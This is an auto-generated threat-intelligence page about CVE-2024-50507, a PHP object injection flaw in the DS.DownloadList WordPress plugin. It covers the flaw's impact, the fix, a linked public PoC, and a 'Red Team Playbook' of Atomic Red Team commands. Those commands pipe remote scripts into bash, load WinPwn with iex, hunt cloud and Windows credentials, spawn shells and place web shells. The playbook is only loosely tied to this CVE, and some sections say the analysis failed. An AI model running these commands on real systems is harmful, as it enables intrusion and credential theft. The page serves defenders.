CVE-2024-50507
Overview
This vulnerability is a deserialization of untrusted data flaw in the Daschmi DS.DownloadList WordPress plugin. The root cause lies in insecure handling of serialized PHP objects within the plugin, allowing malicious input to be deserialized without proper validation. The affected component is the DS.DownloadList plugin versions up to and including 1.3, which processes serialized data leading to potential object injection.
Vulnerability Description
Deserialization of Untrusted Data vulnerability in Daschmi DS.DownloadList dsdownloadlist allows Object Injection.This issue affects DS.DownloadList: from n/a through <= 1.3.
Impact
An unauthenticated attacker can exploit this vulnerability to achieve remote code execution on the hosting server. This allows full compromise of the WordPress environment, including access to sensitive data, alteration of website content, and potential lateral movement within the network. The absence of authentication or user interaction requirements significantly increases the attack surface and risk to affected systems.
Solution
Users of the Daschmi DS.DownloadList plugin should upgrade to a version later than 1.3 where this vulnerability is addressed. The patchstack advisory (https://patchstack.com/database/Wordpress/Plugin/dsdownloadlist/vulnerability/wordpress-ds-downloadlist-plugin-1-3-php-object-injection-vulnerability?_s_id=cve) provides detailed patch instructions and version information. Applying the vendor-supplied update is the recommended remediation to eliminate the insecure deserialization flaw.
EPSS vs KEV Prediction — Evolution (30 days)
Overview
Analysis generation failed
Threat Summary
Analysis generation failed
Full Analysis
The vulnerability associated with the deserialization of untrusted data in the DS.DownloadList component poses a significant risk due to its potential for object injection. This flaw arises when an application processes serialized data without adequately validating its integrity or authenticity. In this case, the affected version of DS.DownloadList allows attackers to craft malicious serialized objects that, when deserialized by the application, can lead to arbitrary code execution or manipulation of application logic. The lack of stringent checks during the deserialization process creates a pathway for attackers to exploit the application, leading to severe consequences.
Attack vectors for this vulnerability are varied and can be executed through multiple means. An attacker could leverage a web interface or API endpoint that accepts serialized data, injecting malicious payloads designed to exploit the deserialization flaw. For instance, an attacker might send a crafted request to the application, which, upon deserialization, executes unintended code or alters the application's behavior. Additionally, if the application stores serialized objects in a database or file system, an attacker could manipulate these stored objects, leading to persistent exploitation. The ease of crafting such payloads and the potential for remote exploitation make this vulnerability particularly dangerous.
The real-world impact of this vulnerability can be profound, especially for organizations relying on the affected component for critical operations. Successful exploitation could result in unauthorized access to sensitive data, disruption of services, or even complete system compromise. The business risks associated with such incidents include financial losses, reputational damage, and potential legal ramifications stemming from data breaches. Furthermore, the high CVSS score of 9.8 indicates that this vulnerability is not only critical but also likely to be targeted by threat actors, increasing the urgency for organizations to address it.
To detect and mitigate the risks associated with this vulnerability, organizations should implement a multi-layered security approach. First, it is crucial to conduct a thorough assessment of all applications utilizing the DS.DownloadList component, identifying any instances where deserialization occurs. Regular security audits and code reviews can help uncover potential weaknesses in the deserialization logic. Additionally, employing input validation and sanitization techniques can significantly reduce the risk of malicious data being processed. Organizations should also consider implementing application firewalls that can detect and block suspicious payloads before they reach the application.
In conclusion, the deserialization of untrusted data vulnerability in the DS.DownloadList component represents a critical threat that requires immediate attention from affected organizations. By understanding the technical details, potential attack vectors, and real-world implications, cybersecurity teams can better prepare to defend against exploitation attempts. Proactive detection and mitigation strategies will be essential in safeguarding sensitive data and maintaining the integrity of business operations in the face of this significant risk.
CSURFACE threat intelligence has identified a significant development in the exploitation landscape of CVE-2024-50507. A public proof-of-concept exploit has emerged on GitHub, marking the first known instance of accessible exploit code targeting the Daschmi DS.DownloadList deserialization vulnerability. This emergence correlates with the assignment of a critical CVSS score of 9.8 and the appearance of a substantial Exploit Prediction Scoring System (EPSS) value, indicating increased likelihood of exploitation attempts in the wild. Our telemetry reflects a marked escalation in exploit availability, which substantially lowers the barrier for threat actors to weaponize this vulnerability. The presence of unauthenticated PHP object injection exploit code publicly available signals a heightened risk of opportunistic attacks, especially from less sophisticated adversaries who can now leverage ready-made tools. Consequently, the threat level for affected environments has escalated from theoretical to imminent, underscoring the urgency for defenders to prioritize detection and response capabilities. This shift in the risk profile demands heightened vigilance as exploitation attempts are expected to increase, potentially impacting the confidentiality and integrity of systems relying on DS.DownloadList versions up to 1.3.
Affected Products
No CPE information available.
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
GitHub PoCs (1)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
RandomRobbieBF/CVE-2024-50507
DS.DownloadList <= 1.3 - Unauthenticated PHP Object Injection
|
RandomRobbieBF | 0 | 0 | 2024-12-16 | View |
Threat Feed
1 eventsProof-of-concept code is publicly available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-586 | Object Injection |
55%
|
Medium | High |
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (2)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2024-50507 |
| patchstack.com |
GitHub CVE
vdb-entry
|
https://patchstack.com/database/Wordpress/Plugin/dsdownloadlist/vulnerability/wordpress-ds-downloadlist-plugin-1-3-php-object-injection-vulnerability?_s_id=cve |